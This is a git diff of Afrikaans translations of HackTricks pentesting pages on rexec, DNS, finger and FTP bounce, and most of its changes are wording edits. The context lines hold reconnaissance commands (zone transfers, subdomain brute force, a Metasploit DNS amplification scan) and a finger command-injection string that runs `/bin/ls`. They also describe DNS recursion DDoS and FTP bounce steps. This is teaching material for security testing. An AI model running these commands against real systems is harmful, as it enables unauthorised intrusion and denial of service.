<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 429.597656 101.195312 C 426.597656 102.1875 423.371094 102.679688 419.933594 102.679688 C 415.503906 102.679688 412.292969 101.75 410.292969 99.886719 C 408.292969 98.03125 407.296875 95 407.296875 90.808594 L 407.296875 79.476562 L 401.363281 79.476562 L 401.363281 70.929688 L 407.296875 70.929688 L 407.296875 62.738281 L 419.039062 62.738281 L 419.039062 70.929688 L 428.292969 70.929688 L 428.292969 79.476562 L 419.039062 79.476562 L 419.039062 89.980469 C 419.039062 91.363281 419.386719 92.382812 420.078125 93.03125 C 420.769531 93.683594 421.890625 94.007812 423.425781 94.007812 C 424.734375 94.007812 426.3125 93.730469 428.171875 93.175781 L 429.597656 101.1875 Z M 429.597656 101.195312 "/>
<g clip-path="url(#clip2)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 94.671875 53.417969 L 144.664062 66.070312 C 145.042969 65.535156 145.425781 65.007812 145.804688 64.476562 L 145.804688 64.460938 C 147.347656 62.273438 148.871094 60.058594 150.371094 57.835938 C 150.601562 57.496094 150.820312 57.15625 151.050781 56.816406 C 152.269531 55.003906 153.464844 53.175781 154.65625 51.339844 C 155.027344 50.765625 155.402344 50.183594 155.769531 49.601562 C 156.835938 47.933594 157.886719 46.25 158.933594 44.5625 C 159.300781 43.964844 159.671875 43.371094 160.039062 42.777344 C 161.394531 40.554688 162.738281 38.308594 164.0625 36.058594 L 164.332031 35.546875 L 162.542969 35.546875 C 156.15625 42.019531 148.746094 49.203125 141.851562 55.148438 L 94.671875 43.210938 L 42.761719 56.332031 L 43.703125 66.3125 Z M 94.671875 53.417969 "/>
</g>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(16.470588%,46.27451%,81.960784%);fill-opacity:1;" d="M 64.011719 149.238281 C 92.40625 127.675781 117.625 102.296875 139.085938 73.6875 L 94.671875 62.453125 L 44.652344 75.105469 L 47.867188 109.082031 C 49.273438 123.929688 54.976562 137.832031 64.019531 149.238281 Z M 64.011719 149.238281 "/>
<g clip-path="url(#clip3)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 53.257812 170.839844 C 53.058594 170.992188 52.851562 171.152344 52.652344 171.304688 C 50.726562 172.78125 48.78125 174.234375 46.832031 175.671875 L 46.832031 176.871094 C 49.03125 176.007812 51.226562 175.128906 53.40625 174.21875 L 62.710938 170.175781 C 67.859375 167.84375 72.949219 165.390625 77.957031 162.816406 C 79.507812 163.976562 81.097656 165.09375 82.746094 166.140625 L 94.675781 173.742188 L 106.609375 166.140625 C 126.398438 153.515625 139.273438 132.464844 141.484375 109.089844 L 144.703125 75.113281 L 142.191406 74.476562 C 118.207031 111.519531 88.222656 144.023438 53.257812 170.839844 Z M 53.257812 170.839844 "/>
</g>
</g>
</svg> </svg>

Before

Width:  |  Height:  |  Size: 12 KiB

After

Width:  |  Height:  |  Size: 19 KiB

View file

@ -15,15 +15,15 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## Basiese Inligting ## Basiese Inligting
Dit is 'n diens wat **jou toelaat om 'n opdrag binne 'n gasheer uit te voer** as jy geldige **bewysstukke** (gebruikersnaam en wagwoord) ken. Dit is 'n diens wat **jou toelaat om 'n opdrag binne 'n gasheer uit te voer** as jy geldige **bewys van identiteit** (gebruikersnaam en wagwoord) ken.
**Standaard Poort:** 512 **Standaard Poort:** 512
``` ```
@ -32,9 +32,9 @@ PORT STATE SERVICE
``` ```
### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec) ### [**Brute-force**](../generic-methodologies-and-resources/brute-force.md#rexec)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,15 +15,15 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsassessering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## **Basiese Inligting** ## **Basiese Inligting**
Die **Domeinnaamstelsel (DNS)** dien as die internet se gids, wat gebruikers in staat stel om toegang tot webwerwe te verkry deur middel van **maklik onthoubare domeinnames** soos google.com of facebook.com, in plaas van die numeriese Internetprotokol (IP) adresse. Deur domeinnames in IP adresse te vertaal, verseker die DNS dat webblaaiers vinnig internetbronne kan laai, wat die manier vereenvoudig waarop ons in die aanlyn wêreld navigeer. Die **Domeinnaamstelsel (DNS)** dien as die internet se gids, wat gebruikers in staat stel om toegang tot webwerwe te verkry deur middel van **maklik onthoubare domeinnames** soos google.com of facebook.com, eerder as die numeriese Internetprotokol (IP) adresse. Deur domeinnames in IP adresse te vertaal, verseker die DNS dat webblaaiers vinnig internetbronne kan laai, wat die manier waarop ons die aanlyn wêreld navigeer vereenvoudig.
**Standaard poort:** 53 **Standaard poort:** 53
``` ```
@ -34,9 +34,9 @@ PORT STATE SERVICE REASON
``` ```
### Verskillende DNS Bedieners ### Verskillende DNS Bedieners
* **DNS Wortel Bedieners**: Hierdie is aan die top van die DNS hiërargie, wat die topvlak domeine bestuur en slegs ingryp as laer vlak bedieners nie reageer nie. Die Internet Korporasie vir Toegewyde Name en Nommers (**ICANN**) toesig oor hul werking, met 'n globale telling van 13. * **DNS Wortel Bedieners**: Hierdie is aan die bokant van die DNS hiërargie, wat die topvlak domeine bestuur en slegs ingryp as laer vlak bedieners nie reageer nie. Die Internet Korporasie vir Toegewyde Name en Nommers (**ICANN**) toesig oor hul werking, met 'n globale telling van 13.
* **Autoritatiewe Naamservers**: Hierdie bedieners het die finale sê vir navrae in hul aangewese sones, wat definitiewe antwoorde bied. As hulle nie 'n antwoord kan verskaf nie, word die navraag na die wortelbedieners opgestoot. * **Autoritatiewe Naamservers**: Hierdie bedieners het die finale sê vir navrae in hul aangewese sones, wat definitiewe antwoorde bied. As hulle nie 'n antwoord kan verskaf nie, word die navraag na die wortelbedieners opgestoot.
* **Nie-autoritatiewe Naamservers**: Gebrek aan eienaarskap oor DNS sones, versamel hierdie bedieners domein inligting deur navrae aan ander bedieners. * **Nie-autoritatiewe Naamservers**: Gebrek aan eienaarskap oor DNS sones, hierdie bedieners versamel domein inligting deur navrae aan ander bedieners.
* **Kas DNS Bediener**: Hierdie tipe bediener onthou vorige navraag antwoorde vir 'n bepaalde tyd om reaksietye vir toekomstige versoeke te versnel, met die kasduur wat deur die autoritatiewe bediener bepaal word. * **Kas DNS Bediener**: Hierdie tipe bediener onthou vorige navraag antwoorde vir 'n bepaalde tyd om reaksietye vir toekomstige versoeke te versnel, met die kasduur wat deur die autoritatiewe bediener bepaal word.
* **Voorwaartse Bediener**: Wat 'n eenvoudige rol dien, stuur voorwaartse bedieners eenvoudig navrae na 'n ander bediener. * **Voorwaartse Bediener**: Wat 'n eenvoudige rol dien, stuur voorwaartse bedieners eenvoudig navrae na 'n ander bediener.
* **Resolver**: Geïntegreer binne rekenaars of routers, voer resolvers naamresolusie plaaslik uit en word nie as autoritatief beskou nie. * **Resolver**: Geïntegreer binne rekenaars of routers, voer resolvers naamresolusie plaaslik uit en word nie as autoritatief beskou nie.
@ -52,7 +52,7 @@ dig version.bind CHAOS TXT @DNS
``` ```
Boonop kan die hulpmiddel [`fpdns`](https://github.com/kirei/fpdns) ook die bediener vingerafdruk. Boonop kan die hulpmiddel [`fpdns`](https://github.com/kirei/fpdns) ook die bediener vingerafdruk.
Dit is ook moontlik om die banner te gryp met 'n **nmap** skrip: Dit is ook moontlik om die banier te gryp met 'n **nmap** skrip:
``` ```
--script dns-nsid --script dns-nsid
``` ```
@ -116,9 +116,9 @@ dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer
As jy in staat is om subdomeine te vind wat na interne IP-adresse oplos, moet jy probeer om 'n omgekeerde dns BF na die NS's van die domein te doen wat vir daardie IP-reeks vra. As jy in staat is om subdomeine te vind wat na interne IP-adresse oplos, moet jy probeer om 'n omgekeerde dns BF na die NS's van die domein te doen wat vir daardie IP-reeks vra.
{% endhint %} {% endhint %}
Another tool to do so: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan) Nog 'n hulpmiddel om dit te doen: [https://github.com/amine7536/reverse-scan](https://github.com/amine7536/reverse-scan)
You can query reverse IP ranges to [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (this tool is also helpful with BGP). Jy kan omgekeerde IP-reekse navraag doen by [https://bgp.he.net/net/205.166.76.0/24#\_dns](https://bgp.he.net/net/205.166.76.0/24#\_dns) (hierdie hulpmiddel is ook nuttig met BGP).
### DNS - Subdomeine BF ### DNS - Subdomeine BF
```bash ```bash
@ -126,7 +126,7 @@ dnsenum --dnsserver <IP_DNS> --enum -p 0 -s 0 -o subdomains.txt -f subdomains-10
dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS> dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS>
dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan dnscan -d <domain> -r -w subdomains-1000.txt #Bruteforce subdomains in recursive way, https://github.com/rbsec/dnscan
``` ```
### Aktiewe Gidsservers ### Aktiewe Gids servers
```bash ```bash
dig -t _gc._tcp.lab.domain.com dig -t _gc._tcp.lab.domain.com
dig -t _ldap._tcp.lab.domain.com dig -t _ldap._tcp.lab.domain.com
@ -155,7 +155,7 @@ dnsrevenum6 pri.authdns.ripe.net 2001:67c:2e8::/48 #Will use the dns pri.authdns
``` ```
### DNS Rekursie DDoS ### DNS Rekursie DDoS
As **DNS-rekursie geaktiveer is**, kan 'n aanvaller **spoof** die **oorsprong** op die UDP-pakket om die **DNS die antwoord na die slagofferbediener** te laat stuur. 'n Aanvaller kan **ANY** of **DNSSEC** rekordtipes misbruik aangesien hulle groter antwoorde het.\ As **DNS-rekursie geaktiveer is**, kan 'n aanvaller **spoof** die **oorsprong** op die UDP-pakket om die **DNS die antwoord na die slagofferbediener** te laat stuur. 'n Aanvaller kan **ANY** of **DNSSEC** rekordtipes misbruik, aangesien hulle groter antwoorde het.\
Die manier om te **kontroleer** of 'n DNS **rekursie** ondersteun, is om 'n domeinnaam te vra en te **kontroleer** of die **vlag "ra"** (_rekursie beskikbaar_) in die antwoord is: Die manier om te **kontroleer** of 'n DNS **rekursie** ondersteun, is om 'n domeinnaam te vra en te **kontroleer** of die **vlag "ra"** (_rekursie beskikbaar_) in die antwoord is:
```bash ```bash
dig google.com A @<IP> dig google.com A @<IP>
@ -168,15 +168,15 @@ dig google.com A @<IP>
![](<../.gitbook/assets/image (146).png>) ![](<../.gitbook/assets/image (146).png>)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & uitbuitingsmodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
### Pos aan nie-bestaande rekening ### Pos aan nie-bestaande rekening
Deur die ondersoek van 'n nie-afleweringskennisgewing (NDN) wat veroorsaak is deur 'n e-pos wat na 'n ongeldige adres binne 'n teikendom gestuur is, word waardevolle interne netwerkbesonderhede dikwels bekend gemaak. Deur die ondersoek van 'n nie-aflewering kennisgewing (NDN) wat veroorsaak is deur 'n e-pos wat na 'n ongeldige adres binne 'n teikendom gestuur is, word waardevolle interne netwerkbesonderhede dikwels bekend gemaak.
Die verskafde nie-afleweringsverslag sluit inligting in soos: Die verskafde nie-afleweringsverslag sluit inligting in soos:
@ -222,7 +222,7 @@ Dangerous settings when configuring a Bind server:
| ----------------- | ------------------------------------------------------------------------------ | | ----------------- | ------------------------------------------------------------------------------ |
| `allow-query` | Definieer watter hosts toegelaat is om versoeke na die DNS-bediener te stuur. | | `allow-query` | Definieer watter hosts toegelaat is om versoeke na die DNS-bediener te stuur. |
| `allow-recursion` | Definieer watter hosts toegelaat is om rekursiewe versoeke na die DNS-bediener te stuur. | | `allow-recursion` | Definieer watter hosts toegelaat is om rekursiewe versoeke na die DNS-bediener te stuur. |
| `allow-transfer` | Definieer watter hosts toegelaat is om sone oordragte van die DNS-bediener te ontvang. | | `allow-transfer` | Definieer watter hosts toegelaat is om sone-oordragte van die DNS-bediener te ontvang. |
| `zone-statistics` | Versamel statistiese data van sones. | | `zone-statistics` | Versamel statistiese data van sones. |
## References ## References
@ -283,9 +283,9 @@ Description: DNS enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit' Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'
``` ```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksplorasie-modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksplorasie modules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
@ -23,7 +23,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
## **Basiese Inligting** ## **Basiese Inligting**
Die **Finger** program/dienst is gebruik om besonderhede oor rekenaargebruikers te verkry. Gewoonlik sluit die inligting wat verskaf word die **gebruiker se aanmeldnaam, volle naam**, en, in sommige gevalle, addisionele besonderhede in. Hierdie ekstra besonderhede kan die kantoor ligging en telefoonnommer (indien beskikbaar), die tyd wat die gebruiker aangemeld het, die periode van inaktiwiteit (idle time), die laaste keer dat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan en projeklêers insluit. Die **Finger** program/dienst is gebruik om besonderhede oor rekenaargebruikers te verkry. Gewoonlik sluit die inligting wat verskaf word die **gebruiker se aanmeldnaam, volle naam**, en, in sommige gevalle, addisionele besonderhede in. Hierdie ekstra besonderhede kan die kantoor ligging en telefoonnommer (indien beskikbaar), die tyd wat die gebruiker aangemeld het, die periode van inaktiwiteit (idle time), die laaste keer dat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan en projek lêers insluit.
**Standaard poort:** 79 **Standaard poort:** 79
``` ```
@ -71,9 +71,9 @@ finger "|/bin/ls -a /@example.com"
finger user@host@victim finger user@host@victim
finger @internal@external finger @internal@external
``` ```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap en funksies wat van rekognisie tot verslagdoening strek. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing- & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -87,7 +87,7 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %} {% endhint %}

View file

@ -13,16 +13,16 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
# Samevatting # Samevatting
As jy toegang het tot 'n bounce FTP bediener, kan jy dit laat versoek om lêers van ander FTP bediener \(waar jy 'n paar akrediteerbare inligting het\) en daardie lêer na jou eie bediener aflaai. As jy toegang het tot 'n bounce FTP bediener, kan jy dit laat versoek om lêers van ander FTP bedieners \(waar jy van sommige akrediteerbare inligting weet\) en daardie lêer na jou eie bediener aflaai.
## Vereistes ## Vereistes
@ -34,9 +34,9 @@ As jy toegang het tot 'n bounce FTP bediener, kan jy dit laat versoek om lêers
## Stappe ## Stappe
1. Maak verbinding met jou eie FTP bediener en maak die verbinding passief \(pasv opdrag\) om dit te laat luister in 'n gids waar die slagoffer diens die lêer sal stuur 1. Verbinde met jou eie FTP bediener en maak die verbinding passief \(pasv opdrag\) om dit te laat luister in 'n gids waar die slagoffer diens die lêer sal stuur
2. Maak die lêer wat na die Slachtoffer bediener gestuur gaan word deur die FTP Middel bediener \(die eksploit\). Hierdie lêer sal 'n platte teks wees van die nodige opdragte om teen die Slachtoffer bediener te autentiseer, die gids te verander en 'n lêer na jou eie bediener af te laai. 2. Maak die lêer wat die FTP Middel bediener na die Slachtoffer bediener gaan stuur \(die eksploit\). Hierdie lêer sal 'n platte teks wees van die nodige opdragte om teen die Slachtoffer bediener te autentiseer, die gids te verander en 'n lêer na jou eie bediener af te laai.
3. Maak verbinding met die FTP Middel Bediener en laai die vorige lêer op 3. Verbinde met die FTP Middel Bediener en laai die vorige lêer op
4. Laat die FTP Middel bediener 'n verbinding met die slagoffer bediener tot stand bring en die eksploit lêer stuur 4. Laat die FTP Middel bediener 'n verbinding met die slagoffer bediener tot stand bring en die eksploit lêer stuur
5. Vang die lêer in jou eie FTP bediener 5. Vang die lêer in jou eie FTP bediener
6. Verwyder die eksploit lêer van die FTP Middel bediener 6. Verwyder die eksploit lêer van die FTP Middel bediener
@ -44,9 +44,9 @@ As jy toegang het tot 'n bounce FTP bediener, kan jy dit laat versoek om lêers
Vir meer gedetailleerde inligting, kyk na die pos: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html) Vir meer gedetailleerde inligting, kyk na die pos: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê. **Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer tyd te gee om dieper te delf, shells te pop en pret te hê.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -6,28 +6,28 @@ Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size=
<details> <details>
<summary>Ondersteun HackTricks</summary> <summary>Support HackTricks</summary>
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)! * Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
{% endhint %} {% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
